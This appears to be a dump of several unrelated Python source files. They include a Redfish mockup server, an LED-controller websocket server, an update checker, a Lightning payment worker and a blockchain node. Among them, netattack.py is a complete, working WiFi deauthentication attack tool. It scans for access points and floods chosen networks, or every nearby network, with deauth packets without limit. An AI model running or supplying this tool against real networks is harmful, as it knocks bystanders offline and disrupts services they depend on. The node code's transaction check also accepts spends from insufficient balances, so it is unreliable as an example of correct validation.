parser.add_argument('--cert', help='the certificate for SSL')
parser.add_argument('--key', help='the key for SSL')
parser.add_argument('-S', '--short-form', '--shortForm', action='store_true',
help='apply short form to mockup (omit filepath /redfish/v1)')
parser.add_argument('-P', '--ssdp', action='store_true',
help='make mockup SSDP discoverable')
args = parser.parse_args()
hostname = args.host
port = args.port
mockDirPath = args.dir
testEtagFlag = args.test_etag
headers = args.headers
responseTime = args.time
timefromJson = args.T
sslMode = args.ssl
sslCert = args.cert
sslKey = args.key
shortForm = args.short_form
ssdpStart = args.ssdp
logger.info('Hostname: {}'.format(hostname))
logger.info('Port: {}'.format(port))
logger.info("Mockup directory path specified: {}".format(mockDirPath))
logger.info("Response time: {} seconds".format(responseTime))
# check if mockup path was specified. If not, use current working directory
if mockDirPath is None:
mockDirPath = os.getcwd()
# create the full path to the top directory holding the Mockup
mockDir = os.path.realpath(mockDirPath) # creates real full path including path for CWD to the -D<mockDir> dir path
logger.info("Serving Mockup in absolute path: {}".format(mockDir))
# check that we have a valid tall mockup--with /redfish in mockDir before proceeding
if not shortForm:
slashRedfishDir = os.path.join(mockDir, "redfish")
if os.path.isdir(slashRedfishDir) is not True:
logger.info("ERROR: Invalid Mockup Directory--no /redfish directory at top. Aborting")
sys.stderr.flush()
sys.exit(1)
if shortForm:
if os.path.isdir(mockDir) is not True or os.path.isfile(os.path.join(mockDir, "index.json")) is not True:
logger.info("ERROR: Invalid Mockup Directory--dir or index.json does not exist")
sys.stderr.flush()
sys.exit(1)
myServer = HTTPServer((hostname, port), RfMockupServer)
if sslMode:
logger.info("Using SSL with certfile: {}".format(sslCert))
myServer.socket = ssl.wrap_socket(myServer.socket, certfile=sslCert, keyfile=sslKey, server_side=True)
# save the test flag, and real path to the mockup dir for the handler to use
myServer.mockDir = mockDir
myServer.testEtagFlag = testEtagFlag
myServer.headers = headers
myServer.timefromJson = timefromJson
myServer.shortForm = shortForm
try:
myServer.responseTime = float(responseTime)
except ValueError as e:
logger.info("Enter an integer or float value")
sys.exit(2)
# myServer.me="HELLO"
mySDDP = None
if ssdpStart:
from gevent import monkey
monkey.patch_all()
# construct path "mockdir/path/to/resource/<filename>"
path, filename, jsonData = '/redfish/v1', 'index.json', None
apath = myServer.mockDir
rpath = clean_path(path, myServer.shortForm)
fpath = os.path.join(apath, rpath, filename) if filename not in ['', None] else os.path.join(apath, rpath)
if os.path.isfile(fpath):
with open(fpath) as f:
jsonData = json.load(f)
f.close()
else:
jsonData = None
protocol = '{}://'.format('https' if sslMode else 'http')
mySDDP = RfSDDPServer(jsonData, '{}{}:{}{}'.format(protocol, hostname, port, '/redfish/v1'), hostname)
logger.info("Serving Redfish mockup on port: {}".format(port))
try:
if mySDDP is not None:
t2 = threading.Thread(target=mySDDP.start)
t2.daemon = True
t2.start()
logger.info('running Server...')
myServer.serve_forever()
except KeyboardInterrupt:
pass
myServer.server_close()
logger.info("Shutting down http server")
# the below is only executed if the program is run as a script
if __name__ == "__main__":
main()
'''
TODO:
1. add -L option to load json and dump output from python dictionary
2. add authentication support -- note that in redfish some api don't require auth
3. add https support
'''
|
websocket_server.py | #!/usr/bin/env python
import asyncio
import json
import queue
import threading
import numpy as np
import websockets
from club_controller import app_config
from club_controller.clients.client_udp_listener import ClientUDPListener
from club_controller.clients.led_strip_mode_id import LedStripModeId
from club_controller.misc.config_manager import config_manager
from club_controller.protocol.message_ids import WebsocketActionId
class WebsocketServer:
def __init__(self, client_handler : ClientUDPListener):
self.client_handler = client_handler
self.websocket_clients = set()
self.message_queue = queue.Queue()
self.is_running = False
def message_queue_worker(self):
# TODO USE MESSAGE QUEUE AND combine messages to only send every x ms
while self.is_running:
item = self.message_queue.get()
print(f'Working on {item}')
print(f'Finished {item}')
self.message_queue.task_done()
async def on_message_received(self, websocket, message):
if __debug__ and app_config.PRINT_WEBSOCKET_STREAM_MESSAGES:
print("Received websocket message: " + str(message))
data = json.loads(message)
try:
message_id = WebsocketActionId(data["action"])
except ValueError:
if __debug__:
print("WebsocketActionId does not exist on the server: ", data["action"])
return
if message_id == WebsocketActionId.CLIENT_LIST_REQUEST:
await websocket.send(self.get_client_list_message())
elif message_id == WebsocketActionId.CLIENT_VALUE_UPDATED:
# TODO only send updated data
if __debug__:
print("Received update from client: ", data)
self.client_handler.update_client(data["data"]["client"])
await self.send_to_all(self.get_client_list_message())
elif message_id == WebsocketActionId.ALL_LED_STRIPS_UPDATED:
self.client_handler.update_all_led_strips(data["data"])
await self.send_to_all(self.get_client_list_message())
elif message_id == WebsocketActionId.UI_CONFIG_REQUEST:
await websocket.send(self.get_ui_config_message())
elif message_id == WebsocketActionId.UI_CONFIG_UPDATED:
config_manager.ui_config_manager.update(data["data"])
await self.send_to_all(self.get_ui_config_message())
elif message_id == WebsocketActionId.NEC_COMMAND:
nec_led_strip_client = self.client_handler.get_client_by_value("uid", data["data"]["client"]["uid"])
nec_led_strip_client.send_nec_command(data["data"]["command"])
elif message_id == WebsocketActionId.MAIN_UI_COMPONENT_UPDATED:
uid = data["data"]["uid"]
ui_config = config_manager.get_ui_config()
if ui_config.get("main_ui_components") is None:
ui_config["main_ui_components"] = []
ui_component = None
for ui_c in ui_config["main_ui_components"]:
if ui_c["uid"] == uid:
ui_component = ui_c
if ui_component == None:
ui_component = {"uid": uid, "show_in_main_ui": data["data"]["show_in_main_ui"]}
ui_config["main_ui_components"].append(ui_component)
else:
ui_component["show_in_main_ui"] = data["data"]["show_in_main_ui"]
await self.send_to_all(self.get_ui_config_message())
elif message_id == WebsocketActionId.SAVE_AS_LED_STRIP_PRESET:
preset_client = self.client_handler.get_client_by_value("uid", data["data"]["client_uid"])
ui_config = config_manager.get_ui_config()
if ui_config.get("led_strip_presets") is None:
ui_config["led_strip_presets"] = []
max_uid = -1
for preset in ui_config["led_strip_presets"]:
if preset["uid"] >= max_uid:
max_uid = preset["uid"]
preset = {"uid": max_uid + 1, "title": data["data"]["title"], "filter": preset_client.filter, "frequency": preset_client.frequency}
ui_config["led_strip_presets"].append(preset)
await self.send_to_all(self.get_ui_config_message())
elif message_id == WebsocketActionId.APPLY_PRESET:
client_uid = data["data"]["uid"]
preset_uid = data["data"]["preset_uid"]
if client_uid == None:
print("APPLY_PRESET: client_uid == None")
return
if preset_uid == None:
print("APPLY_PRESET: preset_uid == None")
return
ui_config = self.get_ui_config()
if ui_config.get("led_strip_presets") is None:
ui_config["led_strip_presets"] = []
preset = ui_config["led_strip_presets"][preset_uid]
if preset == None:
print("APPLY_PRESET: prese == None")
return
client = self.client_handler.get_client_by_value("uid", client_uid)
if client == None:
print("APPLY_PRESET: client == None")
return
client.update_from_json(preset)
await self.send_to_all(self.get_client_list_message())
elif message_id == WebsocketActionId.ALL_LED_STRIP_MODES_UPDATED:
self.client_handler.update_all_led_strips({"mode" : data["data"]["mode"]})
await self.send_to_all(self.get_client_list_message())
elif message_id == WebsocketActionId.MAIN_UI_PARAMETERS_UPDATED:
ui_config = config_manager.get_ui_config()
if ui_config["main_ui_parameters"] is None:
print("WebsocketActionId.MAIN_UI_PARAMETERS_UPDATED: ui_config[main_ui_parameters] is None")
return
config_manager.ui_config_manager.update(data["data"])
await self.send_to_all(self.get_ui_config_message())
elif message_id == WebsocketActionId.CONFIGS_META_REQUEST:
message = self.get_configs_meta_message()
await websocket.send(message)
elif message_id == WebsocketActionId.CONFIG_LOAD:
new_active_id = data["data"]["config_id"]
config_manager.update_active_config(new_active_id=new_active_id)
await self.send_to_all(self.get_configs_meta_message())
await self.send_to_all(self.get_client_list_message())
elif message_id == WebsocketActionId.CONFIG_SAVE:
new_config_name = data["data"]["config_name"]
print("new_config_name: " + str(new_config_name))
config_manager.save_current_config(new_config_name)
await self.send_to_all(self.get_configs_meta_message())
elif message_id == WebsocketActionId.STROBE_DELAY_UPDATED:
ui_config = config_manager.get_ui_config()
if ui_config["main_ui_parameters"] is None:
print("WebsocketActionId.STROBE_DELAY_UPDATED: ui_config[main_ui_parameters] is None")
return
if ui_config["main_ui_parameters"]["strobe"] is None:
print("WebsocketActionId.STROBE_DELAY_UPDATED: ui_config[main_ui_parameters][strobe] is None")
return
strobe = ui_config["main_ui_parameters"]["strobe"]
strobe["delay_ms"] = data["data"]["new_delay"]
config_manager.ui_config_manager.update({"strobe": strobe})
self.client_handler.update_all_led_strips({"strobe": strobe})
await self.send_to_all(self.get_ui_config_message())
elif message_id == WebsocketActionId.SENSOR_UPDATE:
intensity = data["data"]["intensity"]
print("intensity: " + str(intensity))
ui_config = config_manager.get_ui_config()
if ui_config["main_ui_parameters"] is None:
print("WebsocketActionId.STROBE_DELAY_UPDATED: ui_config[main_ui_parameters] is None")
return
if ui_config["main_ui_parameters"]["strobe"] is None:
print("WebsocketActionId.STROBE_DELAY_UPDATED: ui_config[main_ui_parameters][strobe] is None")
return
strobe = ui_config["main_ui_parameters"]["strobe"]
# map sensor intensity to strobe frequency
sensitivity_threshold = 3.0
delay_multiplier = 1500
if intensity <= sensitivity_threshold:
# turn off strobe
self.client_handler.update_all_led_strips({"mode" : LedStripModeId.AUDIO_CLIENT.name})
else:
delay = 1.0/(intensity) * delay_multiplier
print("delay: " + str(delay))
strobe["delay_ms"] = delay
self.client_handler.update_all_led_strips({"strobe": strobe, "mode": LedStripModeId.STROBE.name})
else:
if __debug__:
print("WebsocketActionId is not implemented on server: ", data["action"])
def get_configs_meta_message(self):
return json.dumps({"action": int(WebsocketActionId.CONFIGS_META), "configs_meta": config_manager.get_configs_meta()})
def get_client_list_message(self):
return json.dumps({"action": int(WebsocketActionId.CLIENT_LIST), "clients": list(map(lambda c: c.toJson(), self.client_handler.get_clients()))})
def get_ui_config_message(self):
return json.dumps({"action": int(WebsocketActionId.UI_CONFIG), "ui": config_manager.get_ui_config()})
async def send_to_all_but_this(self, websocket, message):
other_ws = list(filter(lambda ws: ws != websocket, self.websocket_clients))
if other_ws: # asyncio.wait doesn't accept an empty list
await asyncio.wait([ws.send(message) for ws in other_ws])
async def send_to_all(self, message):
if self.websocket_clients: # asyncio.wait doesn't accept an empty list
await asyncio.wait([ws.send(message) for ws in self.websocket_clients])
async def register(self, websocket):
self.websocket_clients.add(websocket)
async def unregister(self, websocket):
self.websocket_clients.remove(websocket)
async def handler(self, websocket, path):
await self.register(websocket)
if __debug__:
print("websocket connected on path: " + str(path))
print("All connected websockets: " + str(self.websocket_clients))
await websocket.send(json.dumps({"action": int(WebsocketActionId.HELLO)}))
await websocket.send(self.get_client_list_message())
try:
async for message in websocket:
await self.on_message_received(websocket, message)
except:
print("Websocket error")
finally:
await self.unregister(websocket)
if __debug__:
print("websocket disconnected on path: " + str(path))
print("All connected websockets: " + str(self.websocket_clients))
def start_server_async(self):
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
start_server = websockets.serve(self.handler, "0.0.0.0", app_config.WEB_SOCKET_PORT)
asyncio.get_event_loop().run_until_complete(start_server)
asyncio.get_event_loop().run_forever()
def on_client_connected(self, client):
message = json.dumps({"action": int(WebsocketActionId.CLIENT_CONNECTED), "client": client.toJson()})
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
asyncio.get_event_loop().run_until_complete(self.send_to_all(message))
def on_client_disonnected(self, client):
message = json.dumps({"action": int(WebsocketActionId.CLIENT_DISCONNECTED), "client": client.toJson()})
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
asyncio.get_event_loop().run_until_complete(self.send_to_all(message))
def on_ui_config_changed(self, data):
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
asyncio.get_event_loop().run_until_complete(self.update_ui_config_on_uis())
def on_client_configs_changed(self, data):
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
asyncio.get_event_loop().run_until_complete(self.update_client_configs_on_uis())
async def update_ui_config_on_uis(self):
message = self.get_ui_config_message()
await self.send_to_all(message)
async def update_client_configs_on_uis(self):
message = self.get_client_list_message()
await self.send_to_all(message)
def run(self):
self.client_handler.subscribe_on_client_connected(self.on_client_connected)
self.client_handler.subscribe_on_client_disconnected(self.on_client_disonnected)
config_manager.subscribe_on_ui_config_changed(self.on_ui_config_changed)
config_manager.subscribe_on_client_configs_changed(self.on_client_configs_changed)
#self.message_queue_thread = threading.Thread(target=self.message_queue_worker, daemon=True, name="Websocket-Message-Queue-Thread")
#self.message_queue_thread.start()
self.server_thread = threading.Thread(target=self.start_server_async, name="Websocket-Server-Thread")
self.server_thread.start()
def stop(self):
self.is_running = False
self.message_queue_thread.join()
self.server_thread.join()
|
update.py | import os
from os.path import dirname, join
import sys
from time import time
import threading
# ensure registry is set up on Windows before we start
from config import appname, appversion, update_feed, update_interval, config
if not getattr(sys, 'frozen', False):
# quick and dirty version comparison assuming "strict" numeric only version numbers
def versioncmp(versionstring):
return map(int, versionstring.split('.'))
class Updater():
def __init__(self, master):
self.root = master
def checkForUpdates(self):
thread = threading.Thread(target = self.worker, name = 'update worker')
thread.daemon = True
thread.start()
def worker(self):
import requests
from xml.etree import ElementTree
r = requests.get(update_feed, timeout = 20, verify = (sys.version_info >= (2,7,9)))
feed = ElementTree.fromstring(r.text)
items = dict([(item.find('enclosure').attrib.get('{http://www.andymatuschak.org/xml-namespaces/sparkle}version'),
item.find('title').text) for item in feed.findall('channel/item')])
lastversion = sorted(items, key=versioncmp)[-1]
if versioncmp(lastversion) > versioncmp(appversion):
self.root.nametowidget('.%s.%s' % (appname.lower(), 'status'))['text'] = items[lastversion] + ' is available'
self.root.update_idletasks()
def close(self):
pass
elif sys.platform=='darwin':
import objc
class Updater():
# http://sparkle-project.org/documentation/customization/
def __init__(self, master):
try:
objc.loadBundle('Sparkle', globals(), join(dirname(sys.executable.decode(sys.getfilesystemencoding())), os.pardir, 'Frameworks', 'Sparkle.framework'))
self.updater = SUUpdater.sharedUpdater()
except:
# can't load framework - not frozen or not included in app bundle?
self.updater = None
def checkForUpdates(self):
if self.updater:
self.updater.checkForUpdates_(None)
def close(self):
self.updater = None
elif sys.platform=='win32':
import ctypes
# https://github.com/vslavik/winsparkle/blob/master/include/winsparkle.h#L272
root = None
def shutdown_request():
root.event_generate('<<Quit>>', when="tail")
class Updater():
# https://github.com/vslavik/winsparkle/wiki/Basic-Setup
def __init__(self, master):
try:
sys.frozen # don't want to try updating python.exe
self.updater = ctypes.cdll.WinSparkle
self.updater.win_sparkle_set_appcast_url(update_feed) # py2exe won't let us embed this in resources
# set up shutdown callback
global root
root = master
self.callback_t = ctypes.CFUNCTYPE(None) # keep reference
self.callback_fn = self.callback_t(shutdown_request)
self.updater.win_sparkle_set_shutdown_request_callback(self.callback_fn)
self.updater.win_sparkle_init()
except:
from traceback import print_exc
print_exc()
self.updater = None
def checkForUpdates(self):
if self.updater:
self.updater.win_sparkle_check_update_with_ui()
def close(self):
if self.updater:
self.updater.win_sparkle_cleanup()
self.updater = None
|
PayInvoiceThread.py | import boto3
from CommonThread import CommonThread
import json
from botocore.client import Config
from lnd import Client
from threading import Thread
class PayInvoiceThread(CommonThread):
def __init__(self, lnddatadir):
super().__init__('PIThread', 'PayInvoiceThread')
config = Config(
read_timeout = 65,
retries = dict(
max_attempts = 10
)
)
self.sfn = boto3.client('stepfunctions', config = config, region_name = 'us-west-2')
self.lnd = Client(lnddatadir)
def handleTaskError(self, token, errorMessage):
self.sfn.send_task_failure(
taskToken = token,
error = "Failed",
cause = str(errorMessage)
)
def handleTask(self, token, data):
self.logger.info('Thread started for payment: {}'.format(data))
paymentResponse = None
for x in range(1):
try:
paymentResponse = self.lnd.sendPayment(data['invoice'], int(data['amount'] / 1000000))
self.logger.info('paymentResponse: {}'.format(paymentResponse))
except Exception as e:
error = e
else:
if paymentResponse.payment_error:
error = paymentResponse.payment_error
else:
data['paymentResponse'] = {
'payment_preimage': paymentResponse.payment_preimage.hex(),
'payment_route': str(paymentResponse.payment_route),
}
self.logger.info('Payment succeeded with {}'.format(paymentResponse.payment_preimage.hex()))
self.sfn.send_task_success(
taskToken = token,
output = json.dumps(data),
)
break
self.logger.error('Payment failed with {} {}'.format(type(error), error))
else:
self.handleTaskError(token, error)
def tryRun(self):
# Make sure lnd is active before getting a task
self.lnd.getInfo()
response = self.sfn.get_activity_task(
activityArn = 'arn:aws:states:us-west-2:434623153115:activity:CdkStackpayInvoiceActivityB30C5FBC',
workerName = 'LNTipServer'
)
if 'taskToken' in response and 'input' in response:
token = response['taskToken']
data = json.loads(response['input'])
# TODO: join all threads before exiting this one
Thread(target = self.handleTask, args = (token, data)).start()
with self.cond:
self.cond.wait(10)
|
netattack.py | #!/usr/bin/env python
import sys
import os
import time
import argparse
from threading import Thread
import logging
logging.getLogger('scapy.runtime').setLevel(logging.ERROR)
from scapy.all import *
conf.verb = 0
W = '\033[0m' # white (normal)
R = '\033[31m' # red
G = '\033[32m' # green
O = '\033[33m' # orange
P = '\033[35m' # purple
BOLD = '\033[1m' # bold
THIN = '\033[1m' # normal
# creating arguments
def argument_parser():
parser = argparse.ArgumentParser(usage='''
'''+BOLD+'''SCAN NETWORKS:'''+THIN+O+'''
-scan (Main command)'''+W+'''
-i or -mon (Interfaces)
-cf (More detailed output format)
-t (Set channel switch delay)
-nr (Don't do a rescan)
'''+BOLD+'''DEAUTH CERTAIN NETWORKS:'''+THIN+O+'''
-deauth (Main command)'''+W+'''
-b (Add a BSSID)
-u (Add a client)
-i or -mon (Interfaces)
-p (Change Packetburst)
-t (set time Interval)
'''+BOLD+'''DEAUTH ALL NETWORKS:'''+THIN+O+'''
-deauthall (Main command)'''+W+'''
-i or -mon (Interfaces)
-p (Packetburst)''')
parser.add_argument('-mon',
'--monitor',
action='store_true',
help='This activates the monitoring mode \
and automatically searches for your wlan device.')
parser.add_argument('-scan',
'--scan',
action='store_true',
help='This is one of the main parameters. \
It searches for all available WiFi-Networks. \
Other parameters can be added optionally.')
parser.add_argument('-cf',
'--channelformat',
action='store_true',
help='It activates the channelformat. \
It\'s kind of verbose layout of searching. \
Espacially useful if searching for 1 network.')
parser.add_argument('-t',
'--timeout',
type=float,
help='This is setting a delay. \
It can be used to add a delay to deauth \
or a delay for switching the channel while scanning. \
DEFAULT = 0.75')
parser.add_argument('-nr',
'--norescan',
action='store_true',
help='-nr can only be used with -scan. \
This deactivates multiple scans \
and stops when channel 14 is reached.')
parser.add_argument('-deauth',
'--deauth',
action='store_true',
help='This is one of the main parameters. \
It deauth-attacks a certain BSSID. \
Adding a client is optionally.')
parser.add_argument('-deauthall',
'--deauthall',
action='store_true',
help='This is one of the main parameters. \
It searches all the WiFi Networks near by \
and deauth-attacks them.')
parser.add_argument('-b',
'--bssid',
nargs='*',
help='With this you add a BSSID to a deauth. \
It\'s a necessary parameter for -deauth.')
parser.add_argument('-a',
'--amount',
default=0,
type=int,
help='This is the amount of deauth-packages to be send. \
It can only be used with -deauth \
DEFAULT = infinite')
parser.add_argument('-u',
'--client',
default='FF:FF:FF:FF:FF:FF',
help='This adds a client to a deauth-attack. \
It can only be used with -deauth and is optionally.\
DEFAULT = FF:FF:FF:FF:FF:FF (Broadcast)')
parser.add_argument('-c',
'--channel',
type=int,
help='This adds a channel to a deauth-attack. \
It can only be used with -d. \
If there is no certain channel the current channel will be used.')
parser.add_argument('-p',
'--packetburst',
type=int,
default=64,
help='This sets the amount of packets in one burst. \
It can only be used with -d \
DEFAULT = 64')
parser.add_argument('-i',
'--interface',
help='This is a necessary parameter. \
It calls the monitoring interface. \
This parameter needs to be included everywhere.')
return parser
def throw_error():
# invalid arguments handling
if not args.deauth and not args.scan and not args.deauthall and not args.monitor:
argument_parser().print_usage()
sys.exit(0)
if not args.interface and not args.monitor:
print('[' +R+ '-' +W+'] No interface selected.')
sys.exit(0)
if args.deauth and args.channelformat:
print('[' +R+ '-' +W+'] Parameter -cf not available when deauthing.')
sys.exit(0)
if args.deauth and not args.bssid:
print('[' +R+ '-' +W+'] Error. No BSSID selected.')
sys.exit(0)
if args.scan and args.packetburst != 64:
print('[' +R+ '-' +W+'] Parameter -p not available when scanning.')
if args.scan and args.amount:
print('[' +R+ '-' +W+'] Parameter -a not available when scanning.')
sys.exit(0)
if args.scan and args.bssid:
print('[' +R+ '-' +W+'] Parameter -b not available when scanning.')
sys.exit(0)
if args.scan and args.deauth:
print('[' +R+ '-' +W+'] Scan and Deauth can\'t be executed at the same time.')
sys.exit(0)
if args.deauth and args.norescan:
print('[' +R+ '-' +W+'] Parameter -nr not available when deauthing.')
if args.deauthall:
if args.bssid or args.channel or args.amount or args.deauth or args.norescan or args.timeout or args.channelformat or args.scan:
print('[' +R+ '-' +W+'] (1) -deauthall -i ["iface"] -p ["packets"]| no more parameters. (2) Remove -deauthall')
if args.bssid and args.client != 'FF:FF:FF:FF:FF:FF':
if len(args.bssid) > 1:
print('[' +R+ '-' +W+'] Unable to add clients if there are multiple BSSIDs.')
sys.exit(0)
if args.interface and args.monitor:
print('[' +R+ '-' +W+'] You can\'t use -i and -mon. Try only one of them.')
sys.exit(0)
# # # # # # # # # # # # # # #
# SCAN #
# # # # # # # # # # # # # # #
# handling the packages
def pckt_handler(pckt):
if pckt.haslayer(Dot11): #-> check if pckt type 802.11
if pckt.type == 0 and pckt.subtype == 8: # check if Beacon frame
if pckt.addr2 not in APs:
APs[pckt.addr2] = on_channel #-> add to APs dict
output_aps(pckt.addr2, pckt.info, on_channel) #-> print it out
# printing found ap
def output_aps(bssid, essid, channel):
ch_space = 2 # leave different space for channel numbers
if len(str(channel)) == 1:
ch_space = 3
if args.channelformat:
print('[' +G+ '+' +W+ '] [' +P+ 'BSSID' +W+ '] '+str(bssid).upper()+' '*2+'|'+' '*2+'[' +P+ 'CH' +W+ '] '+str(channel)+' '*ch_space+'|'+' '*2+'[' +P+ 'ESSID' +W+ '] '+essid+'')
else:
print(str(bssid).upper() + ' | ' + str(channel) + ' '*ch_space + '| ' + str(essid))
# hopping between wifi channels
def channel_hop():
global on_channel
timeout = 0.75
if args.timeout:
timeout = args.timeout
if not args.channelformat:
print('\n[' +O+ '*' +W+ '] Searching for WiFi Networks...\n')
print(O+ 'MAC' + ' '*19 + 'CH' + ' '*5 + 'ESSID' +W)
while True:
if on_channel > 14:
if args.norescan:
print('\nPress CTRL-C to quit...')
sys.exit(0)
elif not rescan:
break
else:
on_channel = 1
if args.channelformat:
print('\n--------------- RESCAN ---------------\n')
continue
if args.channelformat:
print('[CHANNEL] ' + str(on_channel) + '/14')
os.system('iwconfig ' + iface + ' channel ' + str(on_channel))
time.sleep(timeout)
on_channel += 1
# # # # # # # # # # # # # # #
# DEAUTH #
# # # # # # # # # # # # # # #
def set_channel():
channel = 4
if args.channel:
channel = args.channel
os.system('iwconfig ' + iface + ' channel ' + str(channel))
# creating and managing packets
def deauth(args):
bssid = args.bssid
client = args.client
amount = args.amount
sleep = 0
endless = False
if amount == 0:
endless = True
if args.timeout:
sleep = args.timeout
while endless:
for ap in bssid:
ap_c_pckt = Dot11(addr1=client, addr2=ap, addr3=ap) / Dot11Deauth()
if client != 'FF:FF:FF:FF:FF:FF':
c_ap_pckt = Dot11(addr1=ap, addr2=client, addr3=ap) / Dot11Deauth()
try:
for x in range(args.packetburst):
send(ap_c_pckt)
if client != 'FF:FF:FF:FF:FF:FF':
send(c_ap_pckt)
print('[' +G+ '+' +W+ '] Sent Deauth-Packets to ' + ap)
time.sleep(sleep)
except(KeyboardInterrupt):
print('\n[' +R+ '!' +W+ '] ENDING SCRIPT...')
sys.exit(0)
while amount > 0 and not endless:
for ap in bssid:
ap_c_pckt = Dot11(addr1=client, addr2=ap, addr3=ap) / Dot11Deauth()
if client != 'FF:FF:FF:FF:FF:FF':
c_ap_pckt = Dot11(addr1=ap, addr2=client, addr3=ap) / Dot11Deauth()
try:
for x in range(args.packetburst):
send(ap_c_pckt)
if client != 'FF:FF:FF:FF:FF:FF':
send(c_ap_pckt)
print('[' +G+ '+' +W+ '] Sent Deauth-Packets to ' + ap)
amount -= 1
time.sleep(sleep)
except (KeyboardInterrupt):
print('\n[' +R+ '!' +W+ '] ENDING SCRIPT...')
sys.exit(0)
print('[' +R+ '!' +W+ '] Finished successfully.')
def deauth_all():
print('\n[' +O+ '*' +W+ '] Starting deauth...\n')
while True:
for ap in APs:
for x in range(args.packetburst):
try:
ap_c_pckt = Dot11(addr1='ff:ff:ff:ff:ff:ff', addr2=ap, addr3=ap) / Dot11Deauth()
os.system('iwconfig ' + iface + ' channel ' + str(APs[ap]))
send(ap_c_pckt)
except (KeyboardInterrupt):
print('\n[' +R+ '!' +W+ '] ENDING SCRIPT...')
sys.exit(0)
print('[' +G+ '+' +W+ '] Sent Deauth-Packets to ' + str(ap).upper())
# # # # # # # # # # # # # # #
# MONITOR #
# # # # # # # # # # # # # # #
def monitor_on():
ifaces = os.listdir('/sys/class/net/')
status = False
for iface in ifaces:
if 'wlan' in iface:
print('\n[' +G+ '+' +W+ '] Interface found!\nTurning on monitoring mode...')
os.system('ifconfig ' + iface + ' down')
os.system('iwconfig ' + iface + ' mode monitor')
os.system('ifconfig ' + iface + ' up')
print('[' +G+ '+' +W+ '] Turned on monitoring mode on: ' + iface)
status = True
return iface
if status == False:
print('[' +R+ '-' +W+'] No interface found. Try it manually.')
sys.exit(0)
# # # # # # # # # # # # # # #
# MAIN #
# # # # # # # # # # # # # # #
if __name__ == '__main__':
print(P+'* * * * * * * * * * * * * * * * * *')
print('* N E T A T T A C K by chrizator *')
print('* * * * * * * * * * * * * * * * * *'+W)
args = argument_parser().parse_args()
APs = {}
on_channel = 1
rescan = True
throw_error()
iface = None
if args.interface:
iface = args.interface
if args.monitor:
iface = monitor_on()
conf.iface = iface #-> set scapy's interface
## SCAN ##
if args.scan:
# channel hopping thread
hop_t = Thread(target=channel_hop, args=[])
hop_t.daemon = True
hop_t.start()
sniff(iface=iface, prn=pckt_handler, store=0)
## DEAUTH ##
if args.deauth:
set_channel()
deauth(args)
## DEAUTHALL#
if args.deauthall:
rescan = False
hop_t = Thread(target=channel_hop, args=[])
hop_t.daemon = True
hop_t.start()
sniff(iface=iface, prn=pckt_handler, store=0, timeout=13)
deauth_all()
|
node.py | import block
import wallet
import constants
import blockchain
import requests
import transaction
from Crypto.Hash import SHA
from Crypto.PublicKey import RSA
from Crypto.Signature import PKCS1_v1_5
import binascii
import json
import threading
from time import sleep
class node:
def __init__(self, myIp, myPort, imeBootstrap, ipBootstrap, portBootstrap, N):
# initializing the values. If the node is the bootstrap node he initzalizes the ring and th chain as well
self.otherNodeMined = threading.Event();
self.otherNodeMined.clear();
self.mining = False;
self.allow = threading.Event();
self.allow.set();
self.ip = myIp;
self.port = myPort;
self.ipBootstrap = ipBootstrap;
self.portBootstrap = portBootstrap;
self.number = N;
self.myWallet = self.create_wallet()
self.current_id_count = 1;
if imeBootstrap:
self.id = 0;
self.chain = blockchain.blockchain();
self.ring = dict();
genesis = block.Block(1, -1, self.id);
genesisTransaction = transaction.Transaction('0', '0', self.myWallet.address, N * 100, receiverID = '0', genesis = True);
genesis.add_transaction(genesisTransaction);
genesisUTXO = genesisTransaction.transaction_outputs[0]
self.myWallet.transactions.append(genesisUTXO)
tempDict = dict();
tempDict['ip'] = self.ip;
tempDict['port'] = self.port;
tempDict['address'] = self.myWallet.address;
tempDict['utxos'] = [genesisUTXO];
self.ring['0'] = tempDict;
self.chain.add_block(genesis);
self.currentBlock = self.create_new_block()
else:
url = "http://" + ipBootstrap + ":" + str(portBootstrap) + "/registerNewNode"
requestData = '{"ip":"' + myIp + '", "port":' + str(myPort) + ', "address":"' + str(self.myWallet.address) +'"}';
response = requests.post(url, data = requestData);
responseDict = json.loads(response.json());
self.id = responseDict['id'];
self.chain = self.reconstructChain(responseDict['chain']);
if not self.valid_chain(self.chain):
exit();
else:
print("Chain OK, got my Chain")
self.ring = json.loads(responseDict['ring'])
self.currentBlock = self.create_new_block()
def verify_transaction(self, trans):
# verifying the transaction using the public_key and the signature of the transaction object
transDict = trans.to_dict();
transDict.pop('signature');
transString = json.dumps(transDict);
transString = transString.encode();
hTrans = SHA.new(transString);
verifier = PKCS1_v1_5.new(RSA.importKey(binascii.unhexlify(trans.sender_address)));
return verifier.verify(hTrans, binascii.unhexlify(trans.signature))
def create_new_block(self):
#create a new block based on the last one of the chain
newBlock = block.Block(self.chain.listOfBlocks[self.chain.length - 1].current_hash, self.chain.listOfBlocks[self.chain.length - 1].index, self.id);
return newBlock;
def create_wallet(self):
#create a wallet for this node, with a public key and a private key
new_wallet = wallet.wallet();
return new_wallet;
def validate_transaction(self, trans):
#verification of signature and enough NBC's
asked = '0';
for k in self.ring:
if self.ring[k]['address'] == trans.sender_address:
asked = k;
askedBalance = 0;
for utxo in self.ring[asked]['utxos']:
askedBalance += utxo['amount'];
if not self.verify_transaction(trans):
print("not a valid signature");
return False;
elif askedBalance < trans.amount:
print("not enough NBC's");
return True;
else:
return True;
def dummy(self, receiver, amount):
sleep(1)
self.create_transaction(receiver, 100)
def dummy2(self, newID, newIp, newPort, newAddress):
for k in self.ring:
if k != newID and k != str(self.id):
url = "http://"+ self.ring[k]['ip'] + ":" + str(self.ring[k]['port']) + "/receiveNewNodeInfo";
requestData = {'id': newID, 'ip': newIp, 'port': newPort, 'address': newAddress, 'utxos':[]};
requests.post(url, data = json.dumps(requestData));
def dummy3(self):
sleep(0.1);
self.mine_block();
def register_node_to_ring(self, newNodeIp, newNodePort, newNodeAddress):
#add this node to the ring, only the bootstrap node can add a node to the ring after checking his wallet and ip:port address
#bottstrap node informs all other nodes and gives the request node an id and 100 NBCs
self.allow.wait();
if self.current_id_count == self.number:
return("{message: ring full}");
tempDict = dict();
tempDict['ip'] = newNodeIp;
tempDict['port'] = newNodePort;
tempDict['address'] = newNodeAddress;
tempDict['utxos'] = [];
self.ring[str(self.current_id_count)] = tempDict;
